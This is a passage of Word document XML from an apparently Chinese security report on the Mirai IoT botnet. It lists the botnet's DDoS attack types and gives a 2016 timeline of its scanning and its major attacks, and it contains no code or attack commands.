          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染物联网设备，包括</w:t>
      </w:r>
      <w:r w:rsidR="004353F8">
        <w:t xml:space="preserve"> DVR</w:t>
      </w:r>
      <w:r w:rsidR="006C1B45" w:rsidRPr="005B6355">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AE2862">
        <w:t>监控摄像头</w:t>
      </w:r>
      <w:r w:rsidR="003556FB">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="006C1B45" w:rsidRPr="005B6355">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="0084304B" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai僵尸网络</w:t>
      </w:r>
      <w:r w:rsidR="003E254D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被用来进行</w:t>
      </w:r>
      <w:r w:rsidR="00B959E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有意的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDo</w:t>
      </w:r>
      <w:r>
        <w:t>S攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>以实现敲诈勒索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。其主要攻击类型包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="002E5A41" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>VSE(</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE" w:rsidRPr="00DB35D1">
        <w:t>Valve Source Engine) 查询泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>GRE</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="0084304B" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidR="00F85DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪(包含一种对抗IDMS的变种)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRPr="00DB35D1" w:rsidRDefault="00F85DDE" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>伪随机</w:t>
      </w:r>
      <w:r w:rsidR="0084304B" w:rsidRPr="00DB35D1">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>标签前缀攻击</w:t>
      </w:r>
      <w:r w:rsidR="0084304B" w:rsidRPr="00DB35D1">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DB35D1" w:rsidRPr="00DB35D1">
        <w:t>DNS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DB35D1">
        <w:t>水刑</w:t>
      </w:r>
      <w:r w:rsidR="002373BC">
        <w:t>式</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002373BC">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidR="0084304B" w:rsidRPr="00DB35D1">
        <w:t>)</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1257669740"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Tak16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1363128497"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Sec14 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="00F47497">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="0084304B" w:rsidRDefault="00F85DDE" w:rsidP="00DB35D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB35D1">
        <w:t>HTTP GET/POST/HEAD攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B7ED4" w:rsidRDefault="00270DBE" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在寻找新肉鸡的过程中，Mirai对网络的高速扫描行为会对被扫描主机和自身的僵尸主机产生无意的DDoS攻击效果</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-1266140765"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F63267">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION Rol16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00F63267">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60072" w:rsidRDefault="00C60072" w:rsidP="005B6355">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE0F74" w:rsidRDefault="006B7062" w:rsidP="00FE0F74">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>引起我们关注的Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00C60072">
        <w:t>活动时间线总结如下</w:t>
      </w:r>
      <w:r w:rsidR="00C60072">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00241A62" w:rsidRDefault="00241A62" w:rsidP="00FE0F74">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年8月1日 Mirai开始扫描360蜜罐。由于Mirai的syn包特点，可将其与其他扫描源进行区分</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="-797831196"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION 360 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00A9362E" w:rsidRPr="00A9362E">
        <w:t>至9月6日以前，</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00A9362E" w:rsidRPr="00A9362E">
        <w:t>仅扫描23端口。每日扫描源在2k～13k之间波动，中间两个波峰期每日扫描</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A9362E" w:rsidRPr="00A9362E">
        <w:t>源维持</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A9362E" w:rsidRPr="00A9362E">
        <w:t>在8k～11k上下</w:t>
      </w:r>
      <w:r w:rsidR="00A9362E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272683" w:rsidRDefault="00272683" w:rsidP="00272683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2016年9月6日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始扫描2323 端口，与23端口相比，数量小了大约1个数量级。但此时扫描量相对较小，无论是23端口还是2323端口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="00422134">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年9月20日</w:t>
      </w:r>
      <w:r w:rsidR="00FF7BBA">
        <w:t xml:space="preserve"> K</w:t>
      </w:r>
      <w:r>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00FF7BBA">
        <w:t>bs on S</w:t>
      </w:r>
      <w:r>
        <w:t>ecurity遭到620Gbps攻击</w:t>
      </w:r>
      <w:r w:rsidR="00940F5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00422134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涉事的僵尸网络包括Mirai和</w:t>
      </w:r>
      <w:r w:rsidR="00422134" w:rsidRPr="00422134">
        <w:t>BASHLITE</w:t>
      </w:r>
      <w:r w:rsidR="00240703">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
      <w:r w:rsidR="00422134">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年9月21日 OVH遭到</w:t>
      </w:r>
      <w:r w:rsidR="006D0D5D">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>irai僵尸网络的1Tbps攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452B08" w:rsidRDefault="00452B08" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年9月30日左右，Mirai源码被泄露，随后被托管到GitHub。</w:t>
      </w:r>
      <w:r w:rsidR="0075321E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此后，诸多小型Mirai僵尸网络开始涌现</w:t>
      </w:r>
      <w:r w:rsidR="00397B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及一个规模巨大的僵尸网络“400K”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001914D1" w:rsidRDefault="000F74D9" w:rsidP="004D30AE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年10月21</w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:t>日晚间，美国</w:t>
      </w:r>
      <w:r w:rsidR="00197949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS服务商</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:t>Dyn遭到</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDo</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:t>S攻击</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:t>造成众多知名网站无法访问</w:t>
      </w:r>
      <w:r w:rsidR="004D30AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004D30AE">
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="004D30AE" w:rsidRPr="004D30AE">
        <w:t>GitHub, Twitter, Reddit, Netflix, Airbnb</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:t>攻击手段是混合使用DNS</w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>flood和</w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN</w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:t>flood</w:t>
      </w:r>
      <w:r w:rsidR="004A7883" w:rsidRPr="004A7883">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7883">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004F5BB9" w:rsidRPr="004F5BB9">
        <w:t>Level 3最早报告此次攻击跟Mirai有关</w:t>
      </w:r>
      <w:r w:rsidR="006969B5">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidR="004F5BB9" w:rsidRPr="004F5BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360认为仅部分流量来自于Mirai僵尸网络</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="2066906145"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C60072">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C60072">
            <w:instrText xml:space="preserve">CITATION 360 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C60072">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00AC028D" w:rsidRPr="00AC028D">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00C60072">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001914D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00272683" w:rsidRDefault="00272683" w:rsidP="00272683">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年10月23日凌晨，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>累积观察到的</w:t>
      </w:r>
      <w:r w:rsidR="00450BA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bot IP已经有大约</w:t>
      </w:r>
      <w:r w:rsidR="007B71DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>72万，为大型僵尸网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00272683">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00013F59" w:rsidRDefault="00013F59" w:rsidP="00A74D85">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月1日左右开始，利比里亚遭到Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00D94A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D94A81" w:rsidRPr="00A74D85">
        <w:t>Botnet</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D94A81" w:rsidRPr="00A74D85">
        <w:t xml:space="preserve"> 14 14</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D94A81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击达</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数日之久，峰值带宽500Gbps</w:t>
      </w:r>
      <w:r w:rsidR="000E7DAA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，几乎造成全国断网</w:t>
      </w:r>
      <w:r w:rsidR="00D448BD">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="3"/>
      </w:r>
      <w:r w:rsidR="00A74D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="00C60072">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2016年11月7日 Kenzo发布针对7547端口上路由器设备的TR-069/TR064安全公告</w:t>
      </w:r>
      <w:r w:rsidR="006D0D5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452B08" w:rsidRPr="00452B08" w:rsidRDefault="00B437C0" w:rsidP="00452B08">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016年11月26日</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:t>21时</w:t>
      </w:r>
      <w:r w:rsidR="00452B08" w:rsidRPr="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>27分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:t>360蜜罐首次捕捉到了针对</w:t>
      </w:r>
      <w:r w:rsidR="00452B08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7547端口的扫描。这是Mirai的</w:t>
      </w:r>
